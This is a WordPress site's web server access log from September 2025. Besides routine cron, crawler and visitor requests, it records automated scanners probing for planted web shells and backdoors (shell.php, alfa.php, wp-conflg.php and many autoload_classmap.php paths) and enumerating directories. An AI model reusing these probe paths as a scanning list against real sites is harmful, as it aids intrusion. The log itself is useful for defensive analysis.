176.65.149.245 - - [16/Sep/2025:01:52:34 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:01:53:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757958793.1230220794677734375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [16/Sep/2025:01:53:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:01:57:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757959038.3615310192108154296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.62.132.25 - - [16/Sep/2025:01:57:18 +0800] "GET /feed/ HTTP/1.1" 200 82044 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:01:59:07 +0800] "POST /wp-cron.php?doing_wp_cron=1757959146.9687209129333496093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.128.67.187 - - [16/Sep/2025:01:59:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.128.67.187 - - [16/Sep/2025:01:59:08 +0800] "GET / HTTP/1.1" 200 33465 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
149.50.103.48 - - [16/Sep/2025:01:59:20 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:02:06:41 +0800] "POST /wp-cron.php?doing_wp_cron=1757959601.3728799819946289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:02:06:41 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:02:07:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757959656.8006019592285156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.161 - - [16/Sep/2025:02:07:37 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:02:09:06 +0800] "POST /wp-cron.php?doing_wp_cron=1757959746.4181311130523681640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.144.126 - - [16/Sep/2025:02:09:06 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:02:18:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757960298.5394690036773681640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.36.110 - - [16/Sep/2025:02:18:18 +0800] "GET /comments/feed/ HTTP/1.1" 200 704 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:02:21:07 +0800] "POST /wp-cron.php?doing_wp_cron=1757960467.1009900569915771484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
164.90.157.32 - - [16/Sep/2025:02:21:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.90.157.32 - - [16/Sep/2025:02:21:07 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.90.157.32 - - [16/Sep/2025:02:21:09 +0800] "GET /form.html HTTP/1.1" 404 8989 "-" "curl/8.1.2"
164.90.157.32 - - [16/Sep/2025:02:21:09 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
164.90.157.32 - - [16/Sep/2025:02:21:10 +0800] "GET /t4 HTTP/1.1" 404 8989 "-" "Mozilla/5.0"
164.90.157.32 - - [16/Sep/2025:02:21:11 +0800] "GET /geoip/ HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.90.157.32 - - [16/Sep/2025:02:21:12 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.90.157.32 - - [16/Sep/2025:02:21:12 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.90.157.32 - - [16/Sep/2025:02:21:13 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:02:26:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757960788.3296389579772949218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:02:26:28 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.165.69.68 - - [16/Sep/2025:02:28:00 +0800] "GET /wp-content/plugins/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
52.169.188.222 - - [16/Sep/2025:02:29:24 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:24 +0800] "GET /wp-file.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:24 +0800] "GET /k.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:24 +0800] "GET /al.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [16/Sep/2025:02:29:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757960965.6156959533691406250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.169.188.222 - - [16/Sep/2025:02:29:25 +0800] "GET /wp- HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:26 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:26 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:26 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:26 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:27 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:27 +0800] "GET /classsmtps.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:27 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:27 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:28 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:28 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:28 +0800] "GET /browse.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:29 +0800] "GET /wp-signup.php HTTP/1.1" 302 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:30 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:30 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:31 +0800] "GET /assets/atomlib.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:31 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:31 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:31 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:32 +0800] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:32 +0800] "GET /cgi-bin/file.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:32 +0800] "GET /backup.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:32 +0800] "GET /cache.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:32 +0800] "GET /cc.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:33 +0800] "GET /fw.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:33 +0800] "GET /gebase.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:33 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:33 +0800] "GET /doc.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:34 +0800] "GET /e.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:34 +0800] "GET /f35.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:34 +0800] "GET /fi2.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:34 +0800] "GET /filemanager.php? HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:35 +0800] "GET /go.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:35 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:35 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:35 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:36 +0800] "GET /item.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:36 +0800] "GET /jp.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:36 +0800] "GET /load.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:36 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:36 +0800] "GET /13.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:37 +0800] "GET /lv.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:37 +0800] "GET /default.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:37 +0800] "GET /manager.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:37 +0800] "GET /mar.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:38 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:38 +0800] "GET /new.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:38 +0800] "GET /NewFile.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:38 +0800] "GET /past.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:39 +0800] "GET /randkeyword.PhP7 HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:40 +0800] "GET /shell.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:40 +0800] "GET /simple.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:41 +0800] "GET /cgi-bin/ HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:42 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:42 +0800] "GET /updates.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:42 +0800] "GET /403.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:42 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:43 +0800] "GET /y.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:43 +0800] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:43 +0800] "GET /wp-includes/ID3/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:43 +0800] "GET /wp-admin/function.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:44 +0800] "GET /.well-known/acme-challenge/muse.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:44 +0800] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:44 +0800] "GET /wp-content/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:44 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:45 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:45 +0800] "GET /wp-includes/Text/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:45 +0800] "GET /templates/protostar/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:45 +0800] "GET /wp-includes/pomo/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:45 +0800] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:46 +0800] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:46 +0800] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:46 +0800] "GET /wp-includes/assets/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:46 +0800] "GET /wp-includes/bk/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:47 +0800] "GET /wp-includes/blocks/shortcode/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:47 +0800] "GET /wp-includes/css/dist/widgets/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:47 +0800] "GET /wp-includes/fonts/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:47 +0800] "GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:48 +0800] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:48 +0800] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:48 +0800] "GET /wp-admin/includes/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:48 +0800] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:49 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:49 +0800] "GET /wp-admin/js/wp-login.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:49 +0800] "GET /wp-admin/maint/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:49 +0800] "GET /wp-content/plugins/WordPressCore/cong.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:49 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:50 +0800] "GET /wp-content/plugins/index.php HTTP/1.1" 200 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:50 +0800] "GET /wp-content/plugins/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:50 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:50 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:51 +0800] "GET /wp-content/themes/admin.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:51 +0800] "GET /wp-content/themes/index.php HTTP/1.1" 200 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:51 +0800] "GET /wp-content/themes/themes.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:51 +0800] "GET /wp-content/themes/twentytwentytwo/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:52 +0800] "GET /wp-content/upgrade/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:52 +0800] "GET /wp-content/uploads/de_fb_uploads/b.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:52 +0800] "GET /wp-content/uploads/index.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:52 +0800] "GET /wp-includes/SimplePie/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:53 +0800] "GET /wp-includes/IXR/admin.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:53 +0800] "GET /wp-includes/404.php HTTP/1.1" 404 27 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:53 +0800] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 146 "-" "-"
36.133.115.36 - - [16/Sep/2025:02:29:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757960994.4816761016845703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.169.188.222 - - [16/Sep/2025:02:29:54 +0800] "GET /admin/uploads/ HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:55 +0800] "GET /.tmb/ HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:56 +0800] "GET /shop/ HTTP/1.1" 200 72307 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:57 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:58 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:58 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:58 +0800] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:58 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:59 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:59 +0800] "GET /wp-admin/maint/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:29:59 +0800] "GET /wp-content/ HTTP/1.1" 200 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:00 +0800] "GET /wp-content/mu-plugins-old/ HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:00 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 5 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:01 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:01 +0800] "GET /wp-includes/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:01 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:01 +0800] "GET /wp-includes/IXR/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:01 +0800] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:02 +0800] "GET /wp-includes/Requests/Cookie/ HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:03 +0800] "GET /wp-includes/Requests/Response/ HTTP/1.1" 404 31381 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:04 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:04 +0800] "GET /wp-includes/Text/Diff/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:04 +0800] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:05 +0800] "GET /wp-includes/assets/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:05 +0800] "GET /wp-includes/block-bindings/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:05 +0800] "GET /wp-includes/certificates/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:05 +0800] "GET /wp-includes/css/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:06 +0800] "GET /wp-includes/customize/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:06 +0800] "GET /wp-includes/html-api/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:06 +0800] "GET /wp-includes/images/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:06 +0800] "GET /wp-includes/images/smilies/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:06 +0800] "GET /wp-includes/rest-api/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:07 +0800] "GET /wp-includes/rest-api/endpoints/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:07 +0800] "GET /wp-includes/rest-api/fields/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:07 +0800] "GET /wp-includes/rest-api/search/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:07 +0800] "GET /wp-includes/sitemaps/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:08 +0800] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:08 +0800] "GET /wp-includes/sodium_compat/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:08 +0800] "GET /wp-includes/sodium_compat/src/ HTTP/1.1" 403 146 "-" "-"
52.169.188.222 - - [16/Sep/2025:02:30:08 +0800] "GET /wp-includes/style-engine/ HTTP/1.1" 403 146 "-" "-"
43.163.206.70 - - [16/Sep/2025:02:38:06 +0800] "GET /wp-content/uploads/2025/07/1753455650-DSC01469-300x169.webp HTTP/1.1" 200 8050 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:02:39:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757961589.8556408882141113281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:02:39:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:02:43:33 +0800] "POST /wp-cron.php?doing_wp_cron=1757961813.7130310535430908203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.168 - - [16/Sep/2025:02:43:33 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
4.227.36.10 - - [16/Sep/2025:02:43:34 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [16/Sep/2025:02:49:59 +0800] "POST /wp-cron.php?doing_wp_cron=1757962199.2385098934173583984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:02:49:59 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.153.192.98 - - [16/Sep/2025:02:50:39 +0800] "GET /?p=2159 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.192.98 - - [16/Sep/2025:02:50:44 +0800] "GET /2159/ HTTP/1.1" 200 24750 "http://cqqizhou.com/?p=2159" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:02:55:17 +0800] "POST /wp-cron.php?doing_wp_cron=1757962517.5330920219421386718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.205.211.78 - - [16/Sep/2025:02:55:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
